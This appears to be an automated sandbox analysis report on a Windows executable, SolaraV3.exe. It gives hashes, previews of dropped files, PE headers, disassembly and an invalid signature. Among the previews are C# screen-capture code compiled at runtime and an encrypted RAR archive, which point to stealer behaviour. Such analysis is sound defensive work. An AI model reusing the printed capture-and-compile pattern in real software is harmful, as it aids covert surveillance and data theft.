                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                            Entropy (8bit):3.1002446808542996
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryc+ak7YnqqVfPN5Dlq5J:+RI+ycuZhNK+akSVfPNnqX
                                                                                                                                                                                                                            MD5:B924452EC3C619C408C3D05D28887E96
                                                                                                                                                                                                                            SHA1:8C739D3B9CEF4D24724713F57357A46229B06BFF
                                                                                                                                                                                                                            SHA-256:103D379A7AEF9D51E88CEAFE19BE2942845C9DA12139A672C451BB244AB752B0
                                                                                                                                                                                                                            SHA-512:D6D3193119BAF4D160B2F3EE1231BA840BC391F671F52760BBC3F42EDCEE6A86F9B6D6B2D1B64EA43AABE3732D5176DD65B3A8E8A4D324FD25FB6842231B82F2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.3.y.j.i.4.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.3.y.j.i.4.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):615
                                                                                                                                                                                                                            Entropy (8bit):5.332238181534254
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5cNwiR:p37Lvkmb6KOkqe1xBkrk+ikNZSWZEJZX
                                                                                                                                                                                                                            MD5:33C78BF0C2E6639DA4473B5B54B5CE46
                                                                                                                                                                                                                            SHA1:007D0C3116B3C88CF479366E66091EABBD6F795D
                                                                                                                                                                                                                            SHA-256:C10CFE18818A4171C2FB662F945141597346B4569D1C9C08E0C8119BD102FECE
                                                                                                                                                                                                                            SHA-512:51C0126D791A8F900B4EBBA36FF6C0033E1624A2FA2B1A566728B7E91DC9D92B3B26CFD518BD4E7CFAECB45E252433F8A4242CA71D3E90816915C0CCF7C363A3
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs"
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                            Entropy (8bit):3.155354161392627
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:647oEAtf0KhzBU/Xf6mtJm5N0ympW1ulja3Pq:oNz0yme5OychK
                                                                                                                                                                                                                            MD5:1A00D1CEE4B1ED5ECD37DF632F118825
                                                                                                                                                                                                                            SHA1:F2C6B3982503D7355A8D2E1908E9A1354F29BDED
                                                                                                                                                                                                                            SHA-256:FB7884BAF27AB889E693327511078148F078378ED5EC941F505132715550D1E7
                                                                                                                                                                                                                            SHA-512:D9D7DB729D2B8D92681A412B153C74464E5968207948F753ED586B1D41CA66A89742EADDF77B7DB85AA62260A758AE663F151B3C0A3C7AFEF99A720A82FDE6F4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):1161
                                                                                                                                                                                                                            Entropy (8bit):5.500042621155105
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:KoAId3ka6KOkqeFkrDEveKax5DqBVKVrdFAMBJTH:vAkka6NkqeFkrDEveK2DcVKdBJj
                                                                                                                                                                                                                            MD5:45A323E38C7FFFCDD407D1AF86B86D4E
                                                                                                                                                                                                                            SHA1:16C0C41D68403E19EE58A2CEABEEC8778BE728F6
                                                                                                                                                                                                                            SHA-256:1EC49CF0E94AF313A7C5E5059FB7EDEA4D78AA9CD136CA72CA8C8255492E8075
                                                                                                                                                                                                                            SHA-512:A38F9ECA204F9350AFC3586D16F6C28E3A87D88E1DAC48AC55A0760693D46DEA0C9E08DC08E8BDEA4B13CAD42011D993D3DBDAEBDE1B420557A74CDB8A5AA401
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
                                                                                                                                                                                                                            File Type:RAR archive data, v5
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):725982
                                                                                                                                                                                                                            Entropy (8bit):7.9997637765081775
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:phNA+h/ASHmbNiwqiY3axdEgOTIbIPek1KA7+8vES0+zOBVvR7tp4zGeVd1gvZ:y+hY9ptTrNQekZ+8vE+z457tHuDgvZ
                                                                                                                                                                                                                            MD5:05417017ACEFF1DA4CC51458C0D86B73
                                                                                                                                                                                                                            SHA1:3B53B616ECA869EBAB4B5ABA0550E79CC3BC0FB1
                                                                                                                                                                                                                            SHA-256:76B2A12036FAAD3733421679A973540730D5C47406F8A8C9FABC008F13B7D7A9
                                                                                                                                                                                                                            SHA-512:CFA8ED6D10F2D211191927AA4C2EA932E1319DAA983B32DE8E9CE8A012EEE3E83B184F9FC57549A4CFFDBEF24BBD335E68BA68C7638FD2E70E904611091DC02E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:Rar!....V...!......:})..vI..2..Zcn/.1..K.@%.j...=...S...X!.l....#.X6..iU.........,<..<H....k.........^....<.].U.k.-2......c......K..(.R.V.m..{A.....,.....(M.....3z4`.....l.=.j..Z.Qf..].Z..W....y.Q.ox.. Q:.M..]....F.j...T.....N-.".Q........0.'...t./...U].=..Xn-.i..]lg......J.!M3.c....+h1j.N......{..zna....s.BQE...{.s...{%.? T.@.h.b..0.,F-8b..Fk.)z...*_1%.......O/..j..:.i...X..Z.u@...D..O.....~.@....S.W'p.JI.._......d...5.._.-...9...%..c."..k.hiDN..w..hg@~O>.-{.{..C.....9Rv$.....x.~..7.XN...h..t.sN.|..)Ob$......M(.%.......9T.....]x@......S.I..........S.t%#..^.j~Kf....v2....(...1.........|...].o..`.g...q...hs..a...~....#..<.".l.re..N,3xg....9n.V...@ .|.5i...8.O...!..1.e.U.I...!].wy.ri.p%0W..NZO.............`...9....LL...5......U_.....Tz1....@q.....O!..o.$..Z.fu..3.`...C\CTJ .S.(....^.w_.HP..h.9'...~9.4.vN.3>........U...I...6...>&].=d.5Lh#...z..~...W.^.s.......D..H.S.....l2%...).......]MQksC.6@(....)$.k...+^>..m....d..hoG;M..<. .:g..Tq1.
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.989641490875422
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:SolaraV3.exe
                                                                                                                                                                                                                            File size:6'315'120 bytes
                                                                                                                                                                                                                            MD5:7dd77a8611b56c1ed090293e3ab40f08
                                                                                                                                                                                                                            SHA1:1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
                                                                                                                                                                                                                            SHA256:5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
                                                                                                                                                                                                                            SHA512:755ebb1e999ede433f4734552ca91677d33f9309993891435201ed04a539c1537bf80d4c6b45475a8b461ca235a92b27de0f07cfdeb84aaaa467407929523b2e
                                                                                                                                                                                                                            SSDEEP:196608:PrumWebTeOjmFwDRxtYSHdK34kdai7bN3m2EQca:KUK2pM9B3Q9w
                                                                                                                                                                                                                            TLSH:13563344235209F6E9FB123D8852E565E5B274162780CBCF83B486752F23BE09F3BB56
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..
                                                                                                                                                                                                                            Icon Hash:f0e1d4f0d0e972c7
                                                                                                                                                                                                                            Entrypoint:0x14000cdb0
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x66F85A9D [Sat Sep 28 19:35:57 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                            • 29/09/2021 02:00:00 29/09/2024 01:59:59
                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007F220D75371Ch
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007F220D75333Fh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007F220D753AE8h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F220D7534E3h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            jmp 00007F220D7534C7h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                            je 00007F220D7534D6h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                            jne 00007F220D7534B0h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            jmp 00007F220D7534B9h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                            jne 00007F220D7534C9h
                                                                                                                                                                                                                            mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                            call 00007F220D752C15h
                                                                                                                                                                                                                            call 00007F220D753F00h
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007F220D7534C6h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            jmp 00007F220D7534D6h
                                                                                                                                                                                                                            call 00007F220D760A1Fh
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007F220D7534CBh
                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                            call 00007F220D753F10h
                                                                                                                                                                                                                            jmp 00007F220D7534ACh
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                            jne 00007F220D753529h
                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                            jnbe 00007F220D75352Ch
                                                                                                                                                                                                                            call 00007F220D753A5Eh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F220D7534EAh
                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                            jne 00007F220D7534E6h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                            call 00007F220D760812h
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x1b9f0.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x6038280x2448
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x630000x764.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x2b0000x12a500x12c006c7f1289cc6447849d99cffb0f1a812fFalse0.5245442708333333data5.752825520492837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x470000x1b9f00x1ba0050cb2e6cd1841ce42257df5140981af1False0.974300056561086data7.975238468783257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x630000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0x472500x3edPNG image data, 16 x 16, 8-bit/color RGB, non-interlaced1.0109452736318407
                                                                                                                                                                                                                            RT_ICON0x476400x696PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced1.0065243179122183
                                                                                                                                                                                                                            RT_ICON0x47cd80x9e5PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced1.0043426766679826
